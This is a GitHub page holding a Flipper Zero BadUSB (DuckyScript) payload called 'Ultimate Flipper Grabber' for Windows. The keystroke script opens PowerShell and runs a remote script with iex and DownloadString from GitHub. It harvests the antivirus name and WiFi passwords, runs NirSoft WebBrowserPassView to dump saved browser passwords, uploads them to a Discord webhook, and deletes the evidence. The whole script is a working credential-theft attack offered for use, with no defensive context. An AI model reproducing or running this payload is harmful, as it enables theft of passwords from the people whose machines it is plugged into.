-
Notifications
You must be signed in to change notification settings - Fork 171
/
Copy pathGrabber-Discord_Webhook.txt
48 lines (48 loc) · 1.1 KB
/
Grabber-Discord_Webhook.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
REM Title: Ultimate Flipper Grabber
REM Author: blobs0 (https://github.com/blobs0/Ultimate-Flipper-Grabber)
REM Credit Discord webhooks functions :I-am-jakoby
REM Credit Wifi grabber : 7h30th3r0n3 and the0bone
REM Credit Password Nirsoft : moosehadley
REM Target: Windows 10/11 (7/8 not tested)
REM Supported Layout keyboard: US/FR/DE
REM Version: 1.1
REM Category: Grabber
REM Extrait l'antivirus, les mots de passe wifi et de navigateur vers un webhook discord.
DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
REM edit your webhook here
STRING $DiscordUrl = 'Your-Discord-Webhook'
ENTER
STRING iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/blobs0/Ultimate-Flipper-Grabber/main/payload.ps1'))
ENTER
DELAY 500
STRING version-av
ENTER
STRING Wifi
ENTER
STRING Get-Nirsoft
ENTER
DELAY 5000
STRING wbpv28821@
ENTER
STRING .\WebBrowserPassView.exe
ENTER
DELAY 3000
CTRL A
CTRL S
DELAY 1000
STRING export
ENTER
DELAY 1000
ALT F4
DELAY 800
STRING Upload-Discord -file "C:\temp\export.txt" -text "Browser password :"
ENTER
STRING Del-Nirsoft-File
ENTER
STRING EXIT
ENTER